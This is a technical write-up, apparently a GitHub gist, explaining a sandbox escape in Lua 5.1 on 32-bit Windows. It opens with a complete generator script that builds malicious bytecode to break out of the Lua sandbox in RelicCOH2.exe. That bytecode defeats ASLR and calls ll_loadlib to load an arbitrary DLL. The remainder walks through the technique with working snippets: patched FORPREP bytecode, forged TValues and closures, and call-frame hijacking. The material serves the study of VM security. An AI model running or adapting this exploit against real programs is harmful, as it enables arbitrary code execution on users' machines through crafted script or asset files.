matomesc/Exploiting Lua 5.1 on 32-bit Windows.md

## Exploiting Lua 5.1 on 32-bit Windows.md

      
    Raw
  

              Exploiting Lua 5.1 on 32-bit Windows.md
            
          
    Exploiting Lua 5.1 on 32-bit Windows

The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevent bits of the Lua 5.1 virtual machine.
if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
  error("This generator requires a 32-bit version of Lua 5.1")
end

local function outer()
  local magic -- In bytecode, the stack slot corresponding to this local is changed
  local function middle()
    local function f2ii(x) -- Convert double to uint32_t[2]
      if x == 0 then return 0, 0 end
      if x < 0 then x = -x end
      
      local e_lo, e_hi, e, m = -1075, 1023
      while true do
        e = (e_lo + e_hi)
        e = (e - (e % 2)) / 2
        m = x / 2^e
        if m < 0.5 then e_hi = e elseif 1 <= m then e_lo = e else break end
      end
      
      if e+1023 <= 1 then
        m = m * 2^(e+1074)
        e = 0
      else
        m = (m - 0.5) * 2^53
        e = e + 1022
      end
      
      local lo = m % 2^32
      m = (m - lo) / 2^32
      local hi = m + e * 2^20
      return lo, hi
    end
    local function ii2f(lo, hi) -- Convert uint32_t[2] to double
      local m = hi % 2^20
      local e = (hi - m) / 2^20
      m = m * 2^32 + lo
      
      if e ~= 0 then
        m = m + 2^52
      else
        e = 1
      end
      return m * 2^(e-1075)
    end
    local function asnum(x) -- Reinterpret any TValue as a number
      for i = x, x, 0 do -- This would throw an exception for non-numbers if it weren't for modified bytecode
        return i
      end
    end
    local co, upval
    local function inner()
      local ub1 = {[0] = -- Convert uint8_t to char[1]
        "\0", "\1", "\2", "\3", "\4", "\5", "\6", "\7", "\8", "\9", "\10", "\11", "\12", "\13", "\14",
        "\15", "\16", "\17", "\18", "\19", "\20", "\21", "\22", "\23", "\24", "\25", "\26", "\27", "\28",
        "\29", "\30", "\31", "\32", "\33", "\34", "\35", "\36", "\37", "\38", "\39", "\40", "\41", "\42",
        "\43", "\44", "\45", "\46", "\47", "\48", "\49", "\50", "\51", "\52", "\53", "\54", "\55", "\56",
        "\57", "\58", "\59", "\60", "\61", "\62", "\63", "\64", "\65", "\66", "\67", "\68", "\69", "\70",
        "\71", "\72", "\73", "\74", "\75", "\76", "\77", "\78", "\79", "\80", "\81", "\82", "\83", "\84",
        "\85", "\86", "\87", "\88", "\89", "\90", "\91", "\92", "\93", "\94", "\95", "\96", "\97", "\98",
        "\99", "\100", "\101", "\102", "\103", "\104", "\105", "\106", "\107", "\108", "\109", "\110", "\111",
        "\112", "\113", "\114", "\115", "\116", "\117", "\118", "\119", "\120", "\121", "\122", "\123", "\124",
        "\125", "\126", "\127", "\128", "\129", "\130", "\131", "\132", "\133", "\134", "\135", "\136", "\137",
        "\138", "\139", "\140", "\141", "\142", "\143", "\144", "\145", "\146", "\147", "\148", "\149", "\150",
        "\151", "\152", "\153", "\154", "\155", "\156", "\157", "\158", "\159", "\160", "\161", "\162", "\163",
        "\164", "\165", "\166", "\167", "\168", "\169", "\170", "\171", "\172", "\173", "\174", "\175", "\176",
        "\177", "\178", "\179", "\180", "\181", "\182", "\183", "\184", "\185", "\186", "\187", "\188", "\189",
        "\190", "\191", "\192", "\193", "\194", "\195", "\196", "\197", "\198", "\199", "\200", "\201", "\202",
        "\203", "\204", "\205", "\206", "\207", "\208", "\209", "\210", "\211", "\212", "\213", "\214", "\215",
        "\216", "\217", "\218", "\219", "\220", "\221", "\222", "\223", "\224", "\225", "\226", "\227", "\228",
        "\229", "\230", "\231", "\232", "\233", "\234", "\235", "\236", "\237", "\238", "\239", "\240", "\241",
        "\242", "\243", "\244", "\245", "\246", "\247", "\248", "\249", "\250", "\251", "\252", "\253", "\254",
        "\255"}
      local function ub4(x) -- Convert little endian uint32_t to char[4]
        local b0 = x % 256; x = (x - b0) / 256
        local b1 = x % 256; x = (x - b1) / 256
        local b2 = x % 256; x = (x - b2) / 256
        local b3 = x % 256
        return ub1[b0] .. ub1[b1] .. ub1[b2] .. ub1[b3]
      end
      do local l0 = 2^52 local l1, l2, l3, l4, l5, l6, l7 = l0, l0, l0, l0, l0, l0, l0 end
      co = coroutine.wrap(ub4) -- create a CClosure
      upval = 2^52 .. ub4(asnum(co) - (2^52 - 12))
      local upval_ptr = ub4(asnum(upval) - (2^52 - 16 - 12))
      magic = upval_ptr .. upval_ptr -- sets middle's call frame's LClosure::p and LClosure::upvals[0]
    end
    local delta = 39984 -- (char*)ll_loadlib - (char*)luaB_auxwrap
    local dll = "ignore-unsigned-sga.dll"
    inner()
    -- As inner has manipulated the call frame, globals and literal constants cannot be used for the remainder of the function.
    local lo, hi = f2ii(asnum(magic)) -- lo and hi are co's CClosure::env and CClosure::f
    magic = ii2f(lo, hi + delta) -- sets co's CClosure::f to ll_loadlib
    co(dll, dll)
  end
  middle()
end

outer = string.dump(outer)
  :gsub("\96%z%z\128", "\22\0\0\128") -- remove the FORPREP in asnum
  :gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1) -- in outer, bind magic to the stack slot containing the executing function
local f = io.open("ignore-unsigned-sga.fnt", "wb")
f:write(outer)
f:close()

The first structure of interest is the `TValue`, which is used to represent Lua values throughout the virtual machine:
```c
struct TValue {
  union {
    void *p;
    double n;
  } value;
  int tt;
};
```
The value of `tt` specifies which member of the union is in use. We're interested in the following values for `tt` and associated layouts of `TValue` on 32-bit Windows:

Bits 0-31 Bits 32-63 Bits 64-95 (tt) Bits 96-127
unused LUA_TNIL padding
void* unused LUA_TLIGHTUSERDATA padding
double LUA_TNUMBER padding
TString* unused LUA_TSTRING padding
Closure* unused LUA_TFUNCTION padding


The first Lua virtual machine opcodes of interest are `OP_FORPREP` and `OP_FORLOOP`, which are used to implement Lua's numeric for loop. Their implementations are as follows:
```c
case OP_FORPREP:
  const TValue *init = ra;
  const TValue *plimit = ra+1;
  const TValue *pstep = ra+2;
  L->savedpc = pc;  /* next steps may throw errors */
  if (!tonumber(init  , ra  )) luaG_runerror(L, "'for' initial value must be a number");
  if (!tonumber(plimit, ra+1)) luaG_runerror(L, "'for' limit must be a number");
  if (!tonumber(pstep , ra+2)) luaG_runerror(L, "'for' step must be a number");
  setnvalue(ra, nvalue(ra) - nvalue(pstep));
  dojump(L, pc, GETARG_sBx(i));
```
```c
case OP_FORLOOP:
  double step = nvalue(ra+2);
  double idx = nvalue(ra) + step; /* increment index */
  double limit = nvalue(ra+1);
  if ((0 < step) ? (idx <= limit) : (limit <= idx)) {
    dojump(L, pc, GETARG_sBx(i));  /* jump back */
    setnvalue(ra, idx);  /* update internal index... */
    setnvalue(ra+3, idx);  /* ...and external index */
  }
```
In normal operation, `OP_FORPREP` checks that the three parameters to a numeric for loop are in fact numbers, performs the inverse of the addition at the start of `OP_FORLOOP`, and then jumps to a `OP_FORLOOP` instruction. In normal operation, `OP_FORLOOP` executes before the start of the loop and at the end of every loop body, and its role is to increment the loop counter and then conditionally jump back into the loop body. Crucially, because it is assumed that `OP_FORPREP` has checked that every `TValue` contains a number, `OP_FORLOOP` unconditionally interprets the low 64-bits of every `TValue` as a `double`. Although `OP_FORPREP` and `OP_FORLOOP` normally occur in pairs, if we're writing bytecode manually, then we can emit a lone `OP_FORLOOP` instruction, or if we're patching generated bytecode, then we can replace an `OP_FORPREP` instruction with an instruction which just does `dojump(L, pc, GETARG_sBx(i))`.
Patching out an OP_FORPREP instruction gives us our first interesting function:
asnum = loadstring((string.dump(function(x)
  for i = x, x, 0 do
    return i
  end
end):gsub("\96%z%z\128", "\22\0\0\128")))
Upon first inspection, asnum doesn't seem overly useful:
f = function() end
print(tostring(f)) --> function: 003C42D0
print(asnum(f))    --> 1.9511956687576e-317
As a stranger example, consider the following:
do local dummy = 2^52 end
local f = function() end
print(tostring(f))     --> function: 003BC810
print(asnum(f) - 2^52) --> 3917840
The first line creates a TValue containing a 64-bit double payload, and then throws away the TValue as it leaves scope. The second line creates a TValue containing a 32-bit Closure* payload, and due to the stack nature of Lua locals, this TValue re-uses the storage from the previous TValue, so it inherits bits 32-63 from the double. In binary, 2^52 is a one followed by fifty-two zeroes, and a double conveniently has fifty-two bits of mantissa (precision). Therefore, for a thirty-two bit n, 2^52+n in binary is a one followed by twenty zeroes followed by the thirty-two bits of n, and in a double these bits of n occupy the low thirty-two bits. The above example uses this process in reverse to convert f to a thirty-two bit number, which is clear after noticing that 0x003BC810 (hexadecimal) is equal to 3917840 (decimal). As such, asnum gives us a way to pull the TString* or Closure* out of a specially constructed TValue.

The next structure of interest is `LClosure`, which represents an instance of a Lua function:
```c
struct LClosure {
  GCObject *next;
  lu_byte tt; /* == LUA_TFUNCTION */
  lu_byte marked;
  lu_byte isC; /* == 0 */
  lu_byte nupvalues;
  GCObject *gclist;
  struct Table *env;
  struct Proto *p; /* this contains the bytecode to execute */
  UpVal *upvals[nupvalues]; /* variably sized */
};
```
Also of interest is `TString`, which represents a Lua string:
```c
struct TString {
  GCObject *next;
  lu_byte tt; /* == LUA_TSTRING */
  lu_byte marked;
  lu_byte reserved; /* == 0 for most strings */
  unsigned int hash; /* == hash_of(s) */
  size_t len;
  char s[len]; /* variably sized */
};
```
Comparing their memory layouts, we get the following:

Bits 0-31 Bits 32-63 Bits 64-95 Bits 96-127 Bits 128-191
next tt marked isC nupvalues gclist env p upvals[0]
next tt marked reserved padding hash len s[0:3] s[4:7]

Related to `LClosure` is the `UpVal` structure, which represents a single free variable of a Lua closure:
```c
struct UpVal {
  GCObject *next; /* next in the GC list, not the next UpVal */
  lu_byte tt; /* == LUA_TUPVAL */
  lu_byte marked;
  TValue *v;
  /* ... more fields ... (not of interest) */
};
```
To see these structures in practice, consider the following example:
```lua
function outer()
  local s = "Hello"
  local function inner()
    s = "World"
  end
  print(s) --> Hello
  inner()
  print(s) --> World
end
``` 
The `outer` function becomes an `LClosure` with zero `UpVal`s, whereas the `inner` function becomes an `LClosure` with one `UpVal` (whose `v` field points to the `s` variable in `outer`'s stack).

The next topic of note is how call frames work in the Lua virtual machine. For this, consider the following example:
```lua
function f(x)
  local y = 22
  g(33)
end
function g(x)
  h(44)
end
function h(x)
  return 55
end
f(11)
```
When the `return 55` instruction is executing, the top of the stack contains eight interesting values and four call frames:
... low part of stack ... f 11 22 g 33 h 44 55
ambient frame 
f's frame 
g's frame 
h's frame

A function's call frame includes its parameters and local variables, and the function and parameters of anything that it directly calls (as it has to be able to set up the call within its frame). Frames are represented by the `CallInfo` structure:
```c
struct CallInfo {
  TValue* base;
  TValue* func;
  TValue* top;
  const Instruction *savedpc;
  /* ... more fields ... (not of interest) */
};
```
The `base` and `top` fields specify the range of the stack that the above diagram calls a frame. The `func` field points one to the left of `base` (the empty boxes to the left of frames in the above diagram), and specifies which function is being called. The final field of interest, `savedpc`, specifies the location in the function's bytecode to return to when reactivating the call frame - in most cases this will be an instruction immediately following an `OP_CALL` instruction.
Switching between call frames is interesting, and is done by the following code in the Lua virtual machine:
void luaV_execute (lua_State *L, int nexeccalls) {
  LClosure *cl;
  TValue *base;
  TValue *k;
  const Instruction *pc;
 reentry:  /* entry point */
  lua_assert(L->ci->func->tt == LUA_TFUNCTION && !(clvalue(L->ci->func)->l.isC));
  pc = L->savedpc;
  cl = &clvalue(L->ci->func)->l;
  base = L->base;
  k = cl->p->k;
  /* main loop of interpreter */
  for (;;) {
    const Instruction i = *pc++;
    /* ... debugging stuff ... (not of interest) */
    switch (GET_OPCODE(i)) {
      /* ... various other opcodes (some of which use cl and k) ... */
      case OP_CALL: {
        int b = GETARG_B(i);
        int nresults = GETARG_C(i) - 1;
        if (b != 0) L->top = ra+b;  /* else previous instruction set top */
        L->savedpc = pc;
        switch (luaD_precall(L, ra, nresults)) {
          case PCRLUA: {
            nexeccalls++;
            goto reentry;  /* restart luaV_execute over new Lua function */
          }
          /* ... other cases ... (not of interest) */
        }
      }
      case OP_RETURN: {
        int b = GETARG_B(i);
        if (b != 0) L->top = ra+b-1;
        if (L->openupval) luaF_close(L, base);
        L->savedpc = pc;
        b = luaD_poscall(L, ra); /* pos is a shortening of post, as in pre-call and post-call */
        if (--nexeccalls == 0)  /* was previous function running `here'? */
          return;  /* no: return */
        else {  /* yes: continue its execution */
          if (b) L->top = L->ci->top;
          lua_assert(GET_OPCODE(*((L->ci)->savedpc - 1)) == OP_CALL);
          goto reentry;
        }
      }
    }
  }
}
Of particular note is that OP_RETURN ends with goto reentry, and reentry: is followed by a complex assertion which checks that the CallInfo's func field points to a TValue containing an LClosure. However, lua_assert is turned off by default, and very few people turn it on. In our case, assertions are indeed turned off, so the complex assertion doesn't actually run, and the TValue is unconditionally treated as containing an LClosure*.
At this point, the astute reader will recognise the familiarity with OP_FORLOOP, and will recall that we compared the memory layout of LClosure and TString. Given this, it should be obvious where we're going.

The next instruction of interest is `OP_CLOSURE`, which creates a `TValue` containing an `LClosure`, and initialises its `UpVal`s. The implementation of this instruction is as follows:
```c
case OP_CLOSURE:
  Proto *p;
  Closure *ncl;
  int nup, j;
  p = cl->p->p[GETARG_Bx(i)];
  nup = p->nups;
  ncl = luaF_newLclosure(L, nup, cl->env);
  ncl->l.p = p;
  for (j=0; jl.upvals[j] = cl->upvals[GETARG_B(*pc)];
    else {
      lua_assert(GET_OPCODE(*pc) == OP_MOVE);
      ncl->l.upvals[j] = luaF_findupval(L, base + GETARG_B(*pc));
    }
  }
  setclvalue(L, ra, ncl);
  Protect(luaC_checkGC(L));
```
In the cases we're interested in, an `OP_CLOSURE` instruction is followed by one dummy `OP_MOVE` instruction for each upvalue, which collectively specify which `TValue`s of the current call frame should be pointed to by the closure's `UpVal` structures. In generated bytecode, the specified `TValue`s can only be parameters or local variables of the current call frame, but when writing bytecode manually, the specified `TValue`s can be any members of the current call frame.
In particular, when writing bytecode manually we can point UpVals at the same stack slots that the next call frame's CallInfo::func field points to. The following example gives a simple case of this, where print(magic) doesn't print nil:
loadstring(string.dump(function()
  local magic = nil
  local function middle()
    print(magic) --> function: 0051639
  end
  middle()
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1"))()
As a more interesting example, we can change the TValue pointed to by the UpVal, and then return to the call frame whose CallInfo::func pointed at the same TValue:
loadstring(string.dump(function()
  local magic = nil
  local function middle()
    local function inner()
      magic = inner
      return "print", "World"
    end
    inner()
    print("Hello") --> World
  end
  middle()
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))()
The above example is somewhat intricate: because of magic = inner, after the call to inner, luaV_execute's cl variable is set back to inner rather than middle, so print("Hello") actually prints World.

The first interesting application of the above technique is to create arbitrary `TValue`s. For this, we need to recall `asnum` from earlier, and we also need a helper function for converting numbers to strings:
```lua
asnum = loadstring((string.dump(function(x)
  for i = x, x, 0 do
    return i
  end
end):gsub("\96%z%z\128", "\22\0\0\128")))
ub4 = function(x) -- Convert little endian uint32_t to char[4]
local b0 = x % 256; x = (x - b0) / 256
local b1 = x % 256; x = (x - b1) / 256
local b2 = x % 256; x = (x - b2) / 256
local b3 = x % 256
return string.char(b0, b1, b2, b3)
end
The astute reader will note that `ub4` can be rewritten to work even when `string.char` is not present (the actual exploit code for RelicCOH2.exe implements `ub4` by using a lookup table to convert the individual bytes to strings of length 1, and then concatenating the strings).

With these functions in place, consider the following:
```lua
loadstring(string.dump(function()
  local magic = nil
  local function middle()
    local print = print
    local lud, upval
    local function inner()
      lud = 2^52 .. ub4(0xDEADBEEF) .."high".. ub4(2) .."padd"
      upval = 2^52 .."next".."t".."m".."pa".. ub4(asnum(lud) - 2^52 + 16 + 20)
      local upval_ptr = ub4(asnum(upval) - 2^52 + 16 + 20)
      magic = upval_ptr .. upval_ptr
    end
    inner()
    print(magic) --> userdata: DEADBEEF
  end
  middle()
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))()

The first interesting assignment in the above is to the lud variable. Ignoring the 2^52 .. for a moment, the remainder is a 128 bit string which can be interpreted as a TValue: four bytes containing a pointer to 0xDEADBEEF, four unused bytes, four bytes for a tt value of LUA_TLIGHTUSERDATA, and four bytes of padding. The next interesting assignment is to the upval variable. Again ignoring the 2^52 .., the remainder can be interpreted as an UpVal: four bytes for next, one byte each for tt and marked, two bytes of padding, and then four bytes of TValue*. The final interesting assignment to to the magic variable, which is a TString with an 8-byte payload, and will later be reinterpreted as an LClosure. As we've previously seen by comparing the memory layouts, the first four bytes become a Proto*, and the next four bytes become an UpVal*.
At this point, the remaining tricks of the inner function are the numeric constants 2^52, 16, and 20. The result of a string concatenation is a TValue containing a TString*, but this TValue has the interesting property that the 32 unused bits following the TString* are copied from the leftmost operand of the concatenation. As such, when the leftmost operand in a concatenation is 2^52, the resulting TValue can go through asnum and then have 2^52 subtracted to yield the TString*. The next value, 16 is the size of all of the fields in a TString prior to the actual string data. The final value, 20, is the length of the string 4.5035996273705e+015, with this being the string representation of 2^52.

Before the final reveal, two functions of interest are needed:
```lua
f2ii = function(x) -- Convert double to uint32_t[2]
  if x == 0 then return 0, 0 end
  if x < 0 then x = -x end
local e_lo, e_hi, e, m = -1075, 1023
while true do -- this loop is math.frexp
e = (e_lo + e_hi)
e = (e - (e % 2)) / 2
m = x / 2^e
if m < 0.5 then e_hi = e elseif 1 <= m then e_lo = e else break end
end
if e+1023 <= 1 then
m = m * 2^(e+1074)
e = 0
else
m = (m - 0.5) * 2^53
e = e + 1022
end
local lo = m % 2^32
m = (m - lo) / 2^32
local hi = m + e * 2^20
return lo, hi
end
ii2f = function(lo, hi) -- Convert uint32_t[2] to double
local m = hi % 2^20
local e = (hi - m) / 2^20
m = m * 2^32 + lo
if e ~= 0 then
m = m + 2^52
else
e = 1
end
return m * 2^(e-1075)
end
The role of `f2ii` is to take a number (say the result of `asnum`), and return two integers in range `[0, 2^32)`, which are obtained by reinterpreting the 8 bytes of the original `double` as two `uint32_t`s. This particular implementation of `f2ii` ignores the sign bit of the original `double`, so the second return value is always in the range `[0,2^31)`, but this doesn't matter for our purposes. This particular implementation of `f2ii` also fails for inputs which are `NaN` or positive or negative infinity, but again this is acceptable for our purposes. The `ii2f` function performs the inverse of `f2ii`.

The interested reader should consult the [IEEE754-1985](http://en.wikipedia.org/wiki/IEEE_754-1985#Representation_of_numbers) specification of floating point numbers to gain an appreciation of why these functions work. Alternatively, `ii2f` and `f2ii` can be compared to `reader` and `writer` in the [implementation of vstruct](https://github.com/ToxicFrog/vstruct/blob/master/vstruct/io/f.lua).
<hr/>
The final structure of interest is `CClosure`, which is similar to an `LClosure`, but represents an instance of a C function rather than a Lua function:
```c
struct CClosure {
  GCObject *next;
  lu_byte tt; /* == LUA_TFUNCTION */
  lu_byte marked;
  lu_byte isC; /* == 1 */
  lu_byte nupvalues;
  GCObject *gclist;
  struct Table *env;
  int (*f)(lua_State*);
  TValue upvalue[nupvalues]; /* variably sized */
};

The interesting observation is that this structure contains a function pointer, and said function pointer is called when Lua code calls the function represented by the CClosure. If we want to execute arbitrary code, then we could adapt the previous example to construct a CClosure, and then call it rather than print it. Unfortunately, reality is cold and harsh: DEP means that we we can only execute code in memory pages which are marked as executable, and ASLR means that we don't know where those pages are. The normal method for defeating DEP is to call code which is already present in the executable, and in the case of RelicCOH2.exe, the executable contains a function called ll_loadlib, which is the C function that gets called when Lua code calls package.loadlib (the purpose of this function being to load arbitrary DLLs). That solves the DEP problem, but it leaves the ASLR problem: we have no idea where ll_loadlib is in memory.
One approach for defeating ASLR is to inspect the function pointer in an existing CClosure object. In our case, while the Lua sandbox we're playing in doesn't have package.loadlib, it does have coroutine.wrap, and coroutine.wrap creates a CClosure whose function pointer is set to luaB_auxwrap. Following on from the previous example, consider the following:
loadstring(string.dump(function()
  local magic = nil
  local function middle()
    local print, asnum, f2ii = print, asnum, f2ii
    local co, upval
    local function inner()
      do local l0 = 2^52 local l1, l2, l3, l4, l5, l6, l7 = l0, l0, l0, l0, l0, l0, l0 end
      co = coroutine.wrap(function() end)
      upval = 2^52 .."next".."t".."m".."pa".. ub4(asnum(co) - 2^52 + 12)
      local upval_ptr = ub4(asnum(upval) - 2^52 + 16 + 20)
      magic = upval_ptr .. upval_ptr
    end
    inner()
    print(f2ii(asnum(magic))) --> 7906440, 1396459600
  end
  middle()
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))()
In this example, we call coroutine.wrap in order to create a CClosure, and then print out the env and f fields of the CClosure. The line prior to the assignment to co sprays the stack with the value 2^52 to ensure that we can do the usual asnum(co) - 2^52 trick. For pulling out the f field, we cannot use the 2^52 trick,  as the f field is followed by 4 bytes of padding whose value is indeterminate. Instead, we create an UpVal whose TValue* is the address of the env field, and use f2ii/asnum to read two 32-bit values. Note that we could set the TValue* to the address of f, but this would increase the liklihood of f2ii receiving a NaN or an infinity as input, which it cannot handle.
By disassembly, we can learn that in RelicCOH2.exe, luaB_auxwrap and ll_loadlib are 39984 bytes apart. This leads to the following code for defeating ASLR:
loadstring(string.dump(function()
  local magic = nil
  local function middle()
    local print, asnum, f2ii = print, asnum, f2ii
    local co, upval
    local function inner()
      do local l0 = 2^52 local l1, l2, l3, l4, l5, l6, l7 = l0, l0, l0, l0, l0, l0, l0 end
      co = coroutine.wrap(function() end)
      upval = 2^52 .."next".."t".."m".."pa".. ub4(asnum(co) - 2^52 + 12)
      local upval_ptr = ub4(asnum(upval) - 2^52 + 16 + 20)
      magic = upval_ptr .. upval_ptr
    end
    local dll_name = "my_dll.dll"
    local function_name = "entry_point"
    local delta = 39984 -- this offset is only valid for RelicCOH2.exe; it will lead to a crash in most other programs
    inner()
    local env, f = f2ii(asnum(magic))
    f = f + delta
    magic = ii2f(env, f)
    co(dll_name, function_name) -- calls ll_loadlib
  end
  middle()
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))()
Bits 0-31	Bits 32-63	Bits 64-95 (`tt`)	Bits 96-127
unused		`LUA_TNIL`	padding
`void*`	unused	`LUA_TLIGHTUSERDATA`	padding
`double`		`LUA_TNUMBER`	padding
`TString*`	unused	`LUA_TSTRING`	padding
`Closure*`	unused	`LUA_TFUNCTION`	padding
Bits 0-31	Bits 32-63				Bits 64-95	Bits 96-127	Bits 128-191
`next`	`tt`	`marked`	`isC`	`nupvalues`	`gclist`	`env`	`p`	`upvals[0]`
`next`	`tt`	`marked`	`reserved`	padding	`hash`	`len`	`s[0:3]`	`s[4:7]`
... low part of stack ...	`f`	`11`	`22`	`g`	`33`	`h`	`44`	`55`
ambient frame
		`f`'s frame
					`g`'s frame
							`h`'s frame